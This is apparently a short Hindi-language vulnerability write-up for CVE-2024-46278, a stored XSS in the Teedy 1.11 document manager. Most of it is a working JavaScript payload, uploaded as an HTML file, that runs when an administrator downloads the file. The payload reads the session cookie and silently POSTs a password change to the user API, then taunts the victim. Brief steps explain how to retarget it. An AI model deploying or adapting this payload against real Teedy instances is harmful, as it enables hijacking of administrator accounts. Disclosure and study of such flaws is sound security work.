
【Teedy 1.11】खाता अधिग्रहण XSS के माध्यम से
【Teedy 1.11】XSS के माध्यम से खाता अधिग्रहण
फ़ाइलें डाउनलोड करते समय XSS उत्पन्न करने वाली एक कमज़ोरी है। XSS कमज़ोरी एक Teedy व्यवस्थापक को कुछ ही क्लिक में खाता चुराने की अनुमति दे सकती है।
यह कमज़ोरी CVE-2024-46278 के रूप में चिह्नित है: https://www.cve.org/CVERecord?id=CVE-2024-46278
html प्रकार के रूप में अपलोड करें। आपको "Origin" और "Referer" और fetch के तर्क को आवश्यकतानुसार बदलना होगा।<script>
const currentCookie = document.cookie;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};
fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
adminDownload this file चुनें।